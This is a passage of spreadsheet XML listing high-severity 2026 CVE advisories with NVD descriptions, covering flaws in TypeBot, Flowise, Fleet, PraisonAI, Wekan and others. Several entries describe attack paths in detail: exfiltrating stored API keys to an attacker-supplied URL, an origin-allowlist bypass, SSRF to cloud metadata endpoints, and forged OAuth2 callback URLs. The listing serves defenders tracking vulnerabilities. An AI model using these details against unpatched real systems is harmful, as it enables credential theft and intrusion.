      <c r="C2447" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2447" s="5" t="inlineStr"/>
      <c r="F2447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2447" s="5" t="inlineStr"/>
      <c r="H2447" s="5" t="inlineStr"/>
      <c r="I2447" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2447" s="5" t="inlineStr"/>
      <c r="K2447" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2447" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 allow a low-privilege guest member of a workspace to exfiltrate stored OpenAI-compatible API keys by invoking the OpenAI model-listing helper with an attacker-controlled `baseUrl`. The vulnerable path decrypts the selected workspace credential, creates an OpenAI client with the secret in both `apiKey` and the explicit `api-key` header, and then sends the outbound request to the caller-supplied URL. Because the permission check accepts any readable workspace member and `listCredentials` reveals credential identifiers to guests, a guest can force the server to deliver the workspace secret to attacker infrastructure. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M2447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48766</t>
        </is>
      </c>
    </row>
    <row r="2448">
      <c r="A2448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48767</t>
        </is>
      </c>
      <c r="C2448" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2448" s="5" t="inlineStr"/>
      <c r="F2448" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2448" s="5" t="inlineStr"/>
      <c r="H2448" s="5" t="inlineStr"/>
      <c r="I2448" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2448" s="5" t="inlineStr"/>
      <c r="K2448" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2448" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 allow a low-privilege guest member of a workspace to obtain a live Google Sheets OAuth access token for that workspace by calling the Google Sheets helper `getAccessToken`. The vulnerable path checks only whether the caller has read access to the workspace, decrypts the stored Google OAuth credential, refreshes or retrieves the access token through the Google client, and returns the raw bearer token directly to the caller. Because guest members can also enumerate credential identifiers, a guest can mint and reuse the workspace's Google access token outside Typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M2448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48767</t>
        </is>
      </c>
    </row>
    <row r="2449">
      <c r="A2449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49222</t>
        </is>
      </c>
      <c r="C2449" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2449" s="5" t="inlineStr"/>
      <c r="F2449" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2449" s="5" t="inlineStr"/>
      <c r="H2449" s="5" t="inlineStr"/>
      <c r="I2449" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2449" s="5" t="inlineStr"/>
      <c r="K2449" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2449" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product question operations allow a low-privileged Vendor to manage questions under another Vendor's products. The admin/sql/sqlite/product_question.sql queries accept a caller-controlled product_question_id and do not verify product_question.product_id against product.admin_id for the current admin_id. An attacker can read pending question content and moderation data, change question status, edit question content, or delete questions, manipulating product Q&amp;A visibility and integrity. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M2449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49222</t>
        </is>
      </c>
    </row>
    <row r="2450">
      <c r="A2450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49223</t>
        </is>
      </c>
      <c r="C2450" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2450" s="5" t="inlineStr"/>
      <c r="F2450" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2450" s="5" t="inlineStr"/>
      <c r="H2450" s="5" t="inlineStr"/>
      <c r="I2450" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2450" s="5" t="inlineStr"/>
      <c r="K2450" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2450" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product review operations allow a low-privileged Vendor to manage reviews under another Vendor's products. The admin/sql/sqlite/product_review.sql queries accept a caller-controlled product_review_id and do not verify product_review.product_id against product.admin_id for the current admin_id. An attacker can read pending review content, ratings, author information, and moderation state, change review status, edit review content, or delete reviews, manipulating product review visibility and integrity. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M2450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49223</t>
        </is>
      </c>
    </row>
    <row r="2451">
      <c r="A2451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49227</t>
        </is>
      </c>
      <c r="C2451" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2451" s="5" t="inlineStr"/>
      <c r="F2451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2451" s="5" t="inlineStr"/>
      <c r="H2451" s="5" t="inlineStr"/>
      <c r="I2451" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2451" s="5" t="inlineStr"/>
      <c r="K2451" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2451" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend comment operations allow a low-privileged Author to manage comments under another Author's posts. The admin/controller/content/comment.php and admin/controller/content/comments.php controllers and the admin/sql/sqlite/comment.sql queries accept a caller-controlled comment_id without verifying comment.post_id against post.admin_id for the current admin_id. An attacker can read pending comment content and commenter email addresses, change moderation status, edit comment content, or delete comments, breaking author and moderation boundaries. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M2451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49227</t>
        </is>
      </c>
    </row>
    <row r="2452">
      <c r="A2452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53635</t>
        </is>
      </c>
      <c r="C2452" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2452" s="5" t="inlineStr"/>
      <c r="F2452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2452" s="5" t="inlineStr"/>
      <c r="H2452" s="5" t="inlineStr"/>
      <c r="I2452" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2452" s="5" t="inlineStr"/>
      <c r="K2452" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2452" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 59bb6d6, the view function set_course_mode_price() at lms/djangoapps/instructor/views/instructor_dashboard.py:430 is decorated only with @login_required and performs no course-level permission check. Any authenticated user — including a learner account with zero course roles — can issue a single POST request to overwrite the honor mode price and currency of any course on the platform. The companion frontend modal was removed in a prior cleanup, but the URL route and view remain live, making this an unguarded orphan endpoint. This issue has been patched via commit 59bb6d6.</t>
        </is>
      </c>
      <c r="M2452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53635</t>
        </is>
      </c>
    </row>
    <row r="2453">
      <c r="A2453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53958</t>
        </is>
      </c>
      <c r="C2453" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2453" s="5" t="inlineStr"/>
      <c r="F2453" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2453" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2453" s="5" t="inlineStr"/>
      <c r="I2453" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2453" s="5" t="inlineStr"/>
      <c r="K2453" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-915</t>
        </is>
      </c>
      <c r="L2453" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.9, 4gaBoards allows an authenticated user to modify ssoGoogleId, ssoGoogleEmail, ssoGithubId, ssoGithubUsername, ssoGithubEmail, ssoMicrosoftId, ssoMicrosoftEmail, ssoOidcId, and ssoOidcEmail through PATCH /api/users/:id. The whitelist in server/api/controllers/users/update.js mass assigns these backend-managed identity attributes from user input. An attacker can place a victim's provider identifier on an attacker-controlled account, causing the default lookup in helpers such as server/api/helpers/users/get-create-one-for-github-sso.js to match the victim's first SSO login to the attacker's account before the email-linkage flow runs. The victim is logged into the attacker-controlled account, and projects, boards, or data the victim creates remain accessible through the attacker's original local credentials. This issue is fixed in version 3.3.9.</t>
        </is>
      </c>
      <c r="M2453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53958</t>
        </is>
      </c>
    </row>
    <row r="2454">
      <c r="A2454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54245</t>
        </is>
      </c>
      <c r="C2454" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2454" s="5" t="inlineStr"/>
      <c r="F2454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2454" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2454" s="5" t="inlineStr"/>
      <c r="I2454" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2454" s="5" t="inlineStr"/>
      <c r="K2454" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2454" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.86.2, the Okta conditional access integration in Fleet Premium is vulnerable to SQL injection through a host-supplied value that is used in a database query without proper parameterization, allowing an attacker who controls a single enrolled host to read or modify arbitrary data in the Fleet database. The value is reported by the host's own agent and stored verbatim, then used on an unauthenticated request path that supports the conditional access integration, so any party controlling one enrolled host, the lowest-privilege position in the product, can influence the query. By disclosing arbitrary database contents an attacker can extract stored session tokens and replay them to act as a global administrator, and on a managed fleet that administrator access enables running scripts on enrolled hosts, leading to remote code execution. The issue requires Fleet Premium with the Okta conditional access integration enabled and does not affect instances where it is not configured. This issue is fixed in version 4.86.2.</t>
        </is>
      </c>
      <c r="M2454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54245</t>
        </is>
      </c>
    </row>
    <row r="2455">
      <c r="A2455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55532</t>
        </is>
      </c>
      <c r="C2455" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2455" s="5" t="inlineStr"/>
      <c r="F2455" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2455" s="5" t="inlineStr"/>
      <c r="H2455" s="5" t="inlineStr"/>
      <c r="I2455" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2455" s="5" t="inlineStr"/>
      <c r="K2455" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-352</t>
        </is>
      </c>
      <c r="L2455" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, MCP HTTP Stream _validate_origin uses request_origin.startswith(allowed), allowing the attacker-controlled localhost.attacker.com HTTP origin to satisfy the localhost allowlist. A webpage can send Content-Type: text/plain requests without preflight and invoke tools/call without an API key, including file writes that persist agent instructions. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M2455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55532</t>
        </is>
      </c>
    </row>
    <row r="2456">
      <c r="A2456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55643</t>
        </is>
      </c>
      <c r="C2456" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2456" s="5" t="inlineStr"/>
      <c r="F2456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2456" s="5" t="inlineStr"/>
      <c r="H2456" s="5" t="inlineStr"/>
      <c r="I2456" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2456" s="5" t="inlineStr"/>
      <c r="K2456" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2456" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.3, a company-scoped user in FMCS floater mode can access users whose company_id is null because broad API queries and bulk web actions do not consistently apply isCurrentUserHasAccess. The /api/v1/users and /api/v1/users/{id}/licenses endpoints can expose personal data and assigned licenses, /users/bulkeditsave can modify out-of-scope profiles, and /users/merge can soft-delete users and transfer assigned assets. This issue is fixed in version 8.6.3.</t>
        </is>
      </c>
      <c r="M2456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55643</t>
        </is>
      </c>
    </row>
    <row r="2457">
      <c r="A2457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5846</t>
        </is>
      </c>
      <c r="C2457" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2457" s="5" t="inlineStr"/>
      <c r="F2457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2457" s="5" t="inlineStr"/>
      <c r="H2457" s="5" t="inlineStr"/>
      <c r="I2457" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J2457" s="5" t="inlineStr"/>
      <c r="K2457" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L2457" s="5" t="inlineStr">
        <is>
          <t>The affected Watchfire Controller Software contains self-signed hard-coded RSA private keys and corresponding X.509 certificates used for authenticating and encrypting HTTPS/TLS connections to the controller's built-in web management interface. These keys are embedded in plaintext within the application patch binaries in the firmware directly from Watchfire's Remote Support filestore.</t>
        </is>
      </c>
      <c r="M2457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5846</t>
        </is>
      </c>
    </row>
    <row r="2458">
      <c r="A2458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65822</t>
        </is>
      </c>
      <c r="C2458" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2458" s="5" t="inlineStr"/>
      <c r="F2458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2458" s="5" t="inlineStr"/>
      <c r="H2458" s="5" t="inlineStr"/>
      <c r="I2458" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2458" s="5" t="inlineStr"/>
      <c r="K2458" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2458" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.116.0 and 16.23.0, erpnext/selling/report/inactive_customers/inactive_customers.py accepts an unvalidated doctype filter and interpolates it into raw SQL in get_sales_details and get_last_sales_amt, allowing an authenticated user to extract sensitive information and manipulate database queries. This issue is fixed in versions 15.116.0 and 16.23.0.</t>
        </is>
      </c>
      <c r="M2458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65822</t>
        </is>
      </c>
    </row>
    <row r="2459">
      <c r="A2459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65935</t>
        </is>
      </c>
      <c r="C2459" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2459" s="5" t="inlineStr"/>
      <c r="F2459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2459" s="5" t="inlineStr"/>
      <c r="H2459" s="5" t="inlineStr"/>
      <c r="I2459" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2459" s="5" t="inlineStr"/>
      <c r="K2459" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="L2459" s="5" t="inlineStr">
        <is>
          <t>Passkey entry Bluetooth LE legacy pairing can be bypassed in the RS9116W and SiWx917 by manipulating the temporary key value. 
See vulnerability B-E3 in the related paper below.</t>
        </is>
      </c>
      <c r="M2459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65935</t>
        </is>
      </c>
    </row>
    <row r="2460">
      <c r="A2460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68900</t>
        </is>
      </c>
      <c r="C2460" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2460" s="5" t="inlineStr"/>
      <c r="F2460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2460" s="5" t="inlineStr"/>
      <c r="H2460" s="5" t="inlineStr"/>
      <c r="I2460" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2460" s="5" t="inlineStr"/>
      <c r="K2460" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2460" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. From 8.72 until 10.23, addBoardHTMLToZip() in client/lib/exportHTML.js read a card title and body through textContent, which decoded entity-encoded markup, and then interpolated titleText and allText into content.innerHTML in the exported index.html. A board member could store an entity-encoded event-handler payload in a card title that remained inert on the live board but was reparsed and executed when a recipient clicked the card in the downloaded HTML export, allowing the script to read and transmit all board data contained in that export, including content added after the attacker's membership was removed. Version 10.23 builds the modal with DOM nodes and assigns untrusted values through textContent. This issue is fixed in version 10.23.</t>
        </is>
      </c>
      <c r="M2460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68900</t>
        </is>
      </c>
    </row>
    <row r="2461">
      <c r="A2461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69257</t>
        </is>
      </c>
      <c r="C2461" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2461" s="5" t="inlineStr"/>
      <c r="F2461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2461" s="5" t="inlineStr"/>
      <c r="H2461" s="5" t="inlineStr"/>
      <c r="I2461" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2461" s="5" t="inlineStr"/>
      <c r="K2461" s="5" t="inlineStr">
        <is>
          <t>CWE-1389, CWE-918</t>
        </is>
      </c>
      <c r="L2461" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise's HTTP security module httpSecurity.ts did not normalize IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1 and ::ffff:169.254.169.254 before checking them against the deny list. Because ipaddr.js reports these addresses as ipv6 while IPv4 CIDR deny-list entries are ipv4, isDeniedIP() skipped the IPv4 CIDR checks. An attacker who controls DNS resolution for a hostname used by the HTTP Node, API Chain, Document Loader, MCP tool, or other paths using secureAxiosRequest(), secureFetch(), or checkDenyList() could return a AAAA record for an IPv4-mapped target and cause requests to reach localhost, internal services, or cloud metadata endpoints. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M2461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69257</t>
        </is>
      </c>
    </row>
    <row r="2462">
      <c r="A2462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70454</t>
        </is>
      </c>
      <c r="C2462" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2462" s="5" t="inlineStr"/>
      <c r="F2462" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2462" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2462" s="5" t="inlineStr"/>
      <c r="I2462" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2462" s="5" t="inlineStr"/>
      <c r="K2462" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2462" s="5" t="inlineStr">
        <is>
          <t>rsync 3.2.0 through 3.2.3 (openssl mode) and rsync-ssl through 3.4.4 (stunnel mode) contain a TLS certificate validation vulnerability that allows on-path attackers to intercept encrypted sessions by presenting self-signed or otherwise invalid certificates. Attackers can exploit the failure to validate server TLS certificates against a trusted CA or verify certificate hostname matching to decrypt or tamper with rsync session content without detection by the client.</t>
        </is>
      </c>
      <c r="M2462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70454</t>
        </is>
      </c>
    </row>
    <row r="2463">
      <c r="A2463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70474</t>
        </is>
      </c>
      <c r="C2463" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2463" s="5" t="inlineStr"/>
      <c r="F2463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2463" s="5" t="inlineStr"/>
      <c r="H2463" s="5" t="inlineStr"/>
      <c r="I2463" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2463" s="5" t="inlineStr"/>
      <c r="K2463" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2463" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to 3.1.3, Flowise has three OAuth2 credential endpoints that look up credentials by id alone with no workspaceId filter. The authorize, callback, and refresh handlers query the Credential table by id only; callback and refresh are whitelisted from authentication. This allows any authenticated user to initiate OAuth2 flows against credentials belonging to other workspaces, allows an unauthenticated attacker to forge OAuth2 callbacks to overwrite tokens in any credential, and allows an unauthenticated attacker to refresh tokens for any credential. The affected routes include /api/v1/oauth2-credential/authorize/&lt;VICTIM_CREDENTIAL_UUID&gt;, /api/v1/oauth2-credential/callback?code=ATTACKER_AUTH_CODE&amp;state=&lt;VICTIM_CREDENTIAL_UUID&gt;, and /api/v1/oauth2-credential/refresh/&lt;VICTIM_CREDENTIAL_UUID&gt;. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M2463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70474</t>
        </is>
      </c>
    </row>
    <row r="2464">
      <c r="A2464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71048</t>
        </is>
      </c>
      <c r="C2464" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2464" s="5" t="inlineStr"/>
      <c r="F2464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2464" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2464" s="5" t="inlineStr">
        <is>
          <t>oracle:product_lifecycle_analytics</t>
        </is>
      </c>
      <c r="I2464" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2464" s="5" t="inlineStr"/>
      <c r="K2464" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2464" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in the Oracle Product Lifecycle Analytics product of Oracle Supply Chain (component: Installation Issues).   The supported version that is affected is 3.6.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Product Lifecycle Analytics.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle Product Lifecycle Analytics accessible data as well as  unauthorized update, insert or delete access to some of Oracle Product Lifecycle Analytics accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Product Lifecycle Analytics. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L).</t>
        </is>
      </c>
      <c r="M2464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71048</t>
        </is>
      </c>
    </row>
    <row r="2465">
      <c r="A2465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71327</t>
        </is>
      </c>
      <c r="C2465" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2465" s="5" t="inlineStr"/>
      <c r="F2465" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2465" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2465" s="5" t="inlineStr"/>
      <c r="I2465" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2465" s="5" t="inlineStr"/>
      <c r="K2465" s="5" t="inlineStr">
        <is>
          <t>CWE-694</t>
        </is>
      </c>
      <c r="L2465" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 3.0.0 until 3.6.25 and 3.7.10, Traefik's Kubernetes Gateway API provider in pkg/provider/kubernetes/gateway/httproute.go, grpcroute.go, tcproute.go, and tlsroute.go builds HTTPRoute, GRPCRoute, TCPRoute, and TLSRoute router and service identities by hyphen-concatenating namespace, route name, Gateway identity, entry point, and rule index, allowing colliding Routes to overwrite another namespace's backend. This issue is fixed in 3.6.25 and 3.7.10.</t>
        </is>
      </c>
      <c r="M2465" s="6" t="inlineStr">
        <is>
